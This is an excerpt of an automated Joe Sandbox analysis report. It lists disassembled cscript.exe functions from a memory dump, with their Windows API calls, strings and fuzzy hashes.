                                                                                                                                                                                                        • malloc.MSVCRT ref: 00416DE4
                                                                                                                                                                                                        • SysStringLen.OLEAUT32(?), ref: 00416E07
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00416E15
                                                                                                                                                                                                        • SysStringLen.OLEAUT32(?), ref: 00416E25
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00416E32
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00416E48
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00416E57
                                                                                                                                                                                                        • free.MSVCRT(00000000,?,004164F1,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416E5E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$AllocFree$freemalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 945414394-0
                                                                                                                                                                                                        • Opcode ID: 55c48f60214e7f9180a9248ac646fab8acb5ae5b94e0fb3bf9abca03db32360b
                                                                                                                                                                                                        • Instruction ID: 60d504b35f24769532adb80d2ae3f0e49c564e3dfa5237cd826697d038348f4f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55c48f60214e7f9180a9248ac646fab8acb5ae5b94e0fb3bf9abca03db32360b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B119E35100706AFDB215F29ED08A977BF5EF00360F11C53AF859C22A0DB79D8A0CB59
                                                                                                                                                                                                        Function 00416D47 Relevance: 12.1, APIs: 8, Instructions: 56memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • malloc.MSVCRT ref: 00416D4F
                                                                                                                                                                                                        • SysStringLen.OLEAUT32(?), ref: 00416D68
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00416D76
                                                                                                                                                                                                        • SysStringLen.OLEAUT32(?), ref: 00416D86
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00416D93
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00416DA9
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00416DB8
                                                                                                                                                                                                        • free.MSVCRT(00000000,?,00416491,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416DBF
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$AllocFree$freemalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 945414394-0
                                                                                                                                                                                                        • Opcode ID: 8abab04a00de18a45fd07fca4b624f4b9b167981c4b06ac0a57df1d5d37bdf9b
                                                                                                                                                                                                        • Instruction ID: 1d5d5a5b7359d5fd1192bc47b6cfc8c607cf46e3d3f41ff53f9760fa76f433fa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8abab04a00de18a45fd07fca4b624f4b9b167981c4b06ac0a57df1d5d37bdf9b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E11A031200706AFDB205F25FC08ADB7BA5EF00360F02C43AF819C62A0DB35D8A0CB59
                                                                                                                                                                                                        Function 00414D30 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414F81
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414F8A
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414F93
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414F9C
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414FA5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • WScript_OnScriptTerminate, xrefs: 00414EE1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeString
                                                                                                                                                                                                        • String ID: WScript_OnScriptTerminate
                                                                                                                                                                                                        • API String ID: 3341692771-526745235
                                                                                                                                                                                                        • Opcode ID: 651bf8efeb46c8c06015a9f56c2bb32dc4aa915cc938d610eb3da069c7ed0e0b
                                                                                                                                                                                                        • Instruction ID: 03d6c0b7c2ab9785bd9e566faeba606b57e099374c30ce540e28392e9c9de7ce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 651bf8efeb46c8c06015a9f56c2bb32dc4aa915cc938d610eb3da069c7ed0e0b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C819671A00205DFCF14DF94D895AEE7BB5FF88315F10416AE512A73A0DB38AD82CB99
                                                                                                                                                                                                        Function 00408156 Relevance: 10.6, APIs: 7, Instructions: 103COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(0040ECAE,00000104,?,?,?,?,?,?,?,?), ref: 00408188
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 004104DC
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040ECAE,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00410503
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharErrorFullLastMultiNamePathWide
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1285381999-0
                                                                                                                                                                                                        • Opcode ID: 5d9a2d1d488a1c959aa0ee6211e3ef3371205ce35b7f4ae90d6094007c97f9ef
                                                                                                                                                                                                        • Instruction ID: e8332dd31b0591038187e0315656b13b42a81ba3c21ff7ee16ba739c6c010f42
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d9a2d1d488a1c959aa0ee6211e3ef3371205ce35b7f4ae90d6094007c97f9ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C431A97160112ABBDB205F668C48DEB7F6CEF46374B108139B955E6290CA74CD41C7F9
                                                                                                                                                                                                        Function 0040B100 Relevance: 10.6, APIs: 7, Instructions: 87stringlibraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0040B120
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 0040B158
                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040B172
                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040B183
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000800), ref: 0040B194
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00411212
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectorySystemstrcpy_s$ErrorLastLibraryLoad
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3723718217-0
                                                                                                                                                                                                        • Opcode ID: 040b070500c1cb4eb663a4c6381045db7deee91aea24930c33a48f59653946e4
                                                                                                                                                                                                        • Instruction ID: 0e629bb73c2f6b5dd4994b98eabfab2bcbd9547b25440ef91d639fe5839e0da3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 040b070500c1cb4eb663a4c6381045db7deee91aea24930c33a48f59653946e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71212772A00216ABC3119FA49C44BAB77A8EF44740F184176E945EB250EB3DD8448BEE
                                                                                                                                                                                                        Function 0041748C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,?,00000000,0040F129,00000000,?,?,?,80000001,80000001,?,00412623), ref: 004174BE
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,?,?,?,80000001,80000001,?,00412623,00020006), ref: 004174E0
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00412623,00020006,?,?,?,?,0040F129), ref: 004174EC
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,00412623,00020006,?,?,?,?,0040F129), ref: 0041750D
                                                                                                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,?,00000000,0040F129,00000000,?,00000000,00000000,00000000,?,00412623,00020006), ref: 00417526
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharCreateMultiWide$ErrorLast
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows Script Host\Settings
                                                                                                                                                                                                        • API String ID: 3494534822-2126348837
                                                                                                                                                                                                        • Opcode ID: 991cdf4b7798d207e4d0d31d602e58d386c16a9154cf551ca22e4a7a9c63f381
                                                                                                                                                                                                        • Instruction ID: 75024dcd7f7a6ccb3144a682b438e2f0e5b4e7022879cb89ba7316455258348d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 991cdf4b7798d207e4d0d31d602e58d386c16a9154cf551ca22e4a7a9c63f381
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2119331606124BBCB215F679C4DEEB3EBDEF0A7B5B108126B50DE1190DA38C940D6F9
                                                                                                                                                                                                        Function 0041784A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,Timeout,00000000,00000004,?,00000004,?,?,?,0040F129), ref: 0041787B
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,00000000,00000000,00000000,00000000,?,?,?,0040F129), ref: 00417892
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 0041789F
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,00000004,?,?,?,0040F129), ref: 004178D1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$ByteCharErrorLastMultiWide
                                                                                                                                                                                                        • String ID: Timeout
                                                                                                                                                                                                        • API String ID: 1054387349-1325157390
                                                                                                                                                                                                        • Opcode ID: f6c2d6639d9e602e2be25c53e06a1ba2beae8f1285e7d74e4fdcccc5d3d36f49
                                                                                                                                                                                                        • Instruction ID: 3fef3282e4a9f90a968db19fb7be140468da14f039f3e6bdd5d5d0bd0f894706
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6c2d6639d9e602e2be25c53e06a1ba2beae8f1285e7d74e4fdcccc5d3d36f49
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC112170A05214BBD720ABA6CC0DFEB7F7CDF467A0F108129B219D22D0DA788944C7B9
                                                                                                                                                                                                        Function 00407CB0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 228memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00407E00
                                                                                                                                                                                                          • Part of subcall function 00408156: GetFullPathNameW.KERNEL32(0040ECAE,00000104,?,?,?,?,?,?,?,?), ref: 00408188
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00407D2B
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00407D45
                                                                                                                                                                                                          • Part of subcall function 0040B1D0: LoadLibraryExW.KERNEL32(WLDP.DLL,00000000,00000800,?,00000000,?,00407DA1,?,?,?,?,?,?,?), ref: 0040B1E9
                                                                                                                                                                                                          • Part of subcall function 0040B1D0: GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 0040B1FF
                                                                                                                                                                                                          • Part of subcall function 0040B1D0: GetProcAddress.KERNEL32(00000000,WldpIsClassInApprovedList), ref: 0040B216
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00407DA4
                                                                                                                                                                                                          • Part of subcall function 0040AE90: GetProcAddress.KERNEL32(00000000,SaferIdentifyLevel), ref: 0040AF21
                                                                                                                                                                                                          • Part of subcall function 0040AE90: GetProcAddress.KERNEL32(00000000,SaferComputeTokenFromLevel), ref: 0040AF3B
                                                                                                                                                                                                          • Part of subcall function 0040AE90: GetProcAddress.KERNEL32(00000000,SaferCloseLevel), ref: 0040AF55
                                                                                                                                                                                                          • Part of subcall function 0040AE90: memset.MSVCRT ref: 0040AF7D
                                                                                                                                                                                                          • Part of subcall function 0040AE90: memset.MSVCRT ref: 0040AFB9
                                                                                                                                                                                                          • Part of subcall function 004062F0: SendMessageA.USER32(?,00000402,00000000,00000000), ref: 004063D6
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressProc$String$Allocmemset$CloseFreeFullHandleLibraryLoadMessageNamePathSend
                                                                                                                                                                                                        • String ID: .wsf
                                                                                                                                                                                                        • API String ID: 2713354114-2429851548
                                                                                                                                                                                                        • Opcode ID: 4415f84b3e06ac1a5f92366c7f6e930500f947cb5a987b6010b3b106a8a1e6de
                                                                                                                                                                                                        • Instruction ID: 543c0919ee074b9554be98230dd68c5d29de2e01f2423e2b9133579f23eeb7cc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4415f84b3e06ac1a5f92366c7f6e930500f947cb5a987b6010b3b106a8a1e6de
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A371D635E402299BCB249F54CC986EE76A5AF44314F1501FBE806B7391CA7CADC18BDA
                                                                                                                                                                                                        Function 0040A8DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(kernel32.dll,00000000,00000800,-00000001,?,-00000004,?,?,00407147,00000000,00000001), ref: 0040A8FA
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 0040A90C
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00407147,00000000,00000001), ref: 0040A939
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                        • String ID: HeapSetInformation$kernel32.dll
                                                                                                                                                                                                        • API String ID: 145871493-3597996958
                                                                                                                                                                                                        • Opcode ID: a4d31ed78d6f094a4157fd71169f5d558e6a6a691b23bb8ef430e4ce3da59d0c
                                                                                                                                                                                                        • Instruction ID: d4e72b93a31bf5a4427599b3bb06e70ac5c1f1ee0c198771444c130facf2d5de
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4d31ed78d6f094a4157fd71169f5d558e6a6a691b23bb8ef430e4ce3da59d0c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F0C8B230434177D3201B765C49E6B3E6DD7C5B61F254836F502F22C0E978CC51926A
                                                                                                                                                                                                        Function 0040B50C Relevance: 7.6, APIs: 5, Instructions: 83fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileW.KERNEL32(0040B2EA,80000000,00000001,00000000,00000003,08000000,00000000,?,00000000,?,000000FF,000000FF,?,0040B2EA,?), ref: 0040B547
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040B2EA,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,000000FF,000000FF,?,0040B2EA,?), ref: 004113BA
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0040B2EA,?,?,?,?,00000000,00000000), ref: 004113DB
                                                                                                                                                                                                          • Part of subcall function 0040B580: GetFileSize.KERNEL32(0040B2EA,00000000,00000000,?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000,00000000), ref: 0040B595
                                                                                                                                                                                                          • Part of subcall function 0040B580: CreateFileMappingA.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B5B6
                                                                                                                                                                                                          • Part of subcall function 0040B580: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000), ref: 0040B5D0
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Create$ByteCharErrorLastMappingMultiSizeViewWide
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 506574795-0
                                                                                                                                                                                                        • Opcode ID: c307438f9f78195f5d16abc15c4ff43356e3018b70c572dc6eaacf8a2dcbce8f
                                                                                                                                                                                                        • Instruction ID: af3416d74fb726c0c47c6b1a6f3aa103412d748d0bee3d0a45132b5137fa810b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c307438f9f78195f5d16abc15c4ff43356e3018b70c572dc6eaacf8a2dcbce8f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0210830201219BAEB205F6A9C48FDB3E6DDF063A4F20412AB919F51E1D7789D40C6FD
                                                                                                                                                                                                        Function 0040C130 Relevance: 7.6, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00419498), ref: 0040C155
                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00419498), ref: 0040C192
                                                                                                                                                                                                        • LoadRegTypeLib.OLEAUT32(?,?,00000000,?,?), ref: 00411651
                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00419498), ref: 00411662
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CriticalSection$Leave$EnterLoadType
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2204791303-0
                                                                                                                                                                                                        • Opcode ID: 4b4b55254079654069af944184cb8224518bafe14a335a8be55b8cda5e021ff6
                                                                                                                                                                                                        • Instruction ID: ad7f7f4cd523d170f23ff26127721049b148f8dc12106d8e42373cc3d0703c77
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b4b55254079654069af944184cb8224518bafe14a335a8be55b8cda5e021ff6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C21A034300205EFC710DF98DC84BAA77B5FF88310F24416AE9069B391D779AC52DB9A
                                                                                                                                                                                                        Function 00408103 Relevance: 7.6, APIs: 5, Instructions: 79registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?,?,?,?,80000000,80000000,?,00407F9E,?,?,?,?), ref: 00408134
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,80000000,80000000,?,00407F9E,?), ref: 00410495
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,00407F9E,?,?,?,?,?), ref: 004104B6
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,00020019,?,?,?,?,80000000,80000000,?,00407F9E,?,?,?,?), ref: 004104D1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharMultiOpenWide
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 471680335-0
                                                                                                                                                                                                        • Opcode ID: 4a76e1f2eb5863a6df63a6fa7d6b76b440a2c1bd9b3053e46e1675eadf7425d4
                                                                                                                                                                                                        • Instruction ID: 3a807e069bba6d6c2ff4a14daaf2d5931043fd0b66c12e8c6bb40dd879f7c362
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a76e1f2eb5863a6df63a6fa7d6b76b440a2c1bd9b3053e46e1675eadf7425d4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0111E970A01215BEEB205F769C48EFB7AACDF48364F10852AB915D61D1DA78CC80D679
                                                                                                                                                                                                        Function 00407030 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: wcscpy_s
                                                                                                                                                                                                        • String ID: WSH
                                                                                                                                                                                                        • API String ID: 4009619764-2133009938
                                                                                                                                                                                                        • Opcode ID: 14cacd0457c96a9b106f8b6e7934d7291b85f4e7c86aa3e256102048bb843386
                                                                                                                                                                                                        • Instruction ID: b40d03c92710f10e936c82851957cf212c1e1d7fb78f42dc0843a08acb6a05c4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14cacd0457c96a9b106f8b6e7934d7291b85f4e7c86aa3e256102048bb843386
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39515970A042159BDB24DB14CC85BBA7369FB44314F1445BBE906A73C0DB39BD42CBAA
                                                                                                                                                                                                        Function 0040A160 Relevance: 6.1, APIs: 4, Instructions: 111memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0040DBC0: malloc.MSVCRT ref: 0040DBD8
                                                                                                                                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 0040A1C1
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0040A1FE
                                                                                                                                                                                                        • SafeArrayPutElement.OLEAUT32(2C6A5756,?,?), ref: 0040A21D
                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040A22A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ArraySafe$AllocClearCreateElementStringVariantmalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 90143694-0
                                                                                                                                                                                                        • Opcode ID: 872d98077140fd6e5aa7cbdd36bbd5fd78a25e75bf74e113c43c91fa65265e02
                                                                                                                                                                                                        • Instruction ID: 29fac1f8024a2f76bdefdb532a7e0bc1aa223bbe4a17317b62d33d50eb008a15
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 872d98077140fd6e5aa7cbdd36bbd5fd78a25e75bf74e113c43c91fa65265e02
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25417271A002069BDB00DFA5C880AEEB7B5FF44314F1081BAD915EB350DB79ED91CB9A
                                                                                                                                                                                                        Function 00408070 Relevance: 6.1, APIs: 4, Instructions: 97registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 004080BD
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00410407
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0041043D
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0041044B
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: QueryValue$ByteCharErrorLastMultiWide
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1671509117-0
                                                                                                                                                                                                        • Opcode ID: f45af9d0f61546047dab5e8213e02a68fa7a3441be714861e795b67a57449b2f
                                                                                                                                                                                                        • Instruction ID: e655dcfdbaf998bcae5477ba737e8660124b5760f489e81d8e2fc3bcaf1c3bb3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f45af9d0f61546047dab5e8213e02a68fa7a3441be714861e795b67a57449b2f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9431D330A00108BBEB209B549D85BEF7BB8EB04320F11C06BF951EB2D1DA79DD84874D
                                                                                                                                                                                                        Function 0040A410 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SafeArrayDestroy.OLEAUT32(?), ref: 0040A43E
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0040A47F
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0040A488
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0040A491
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
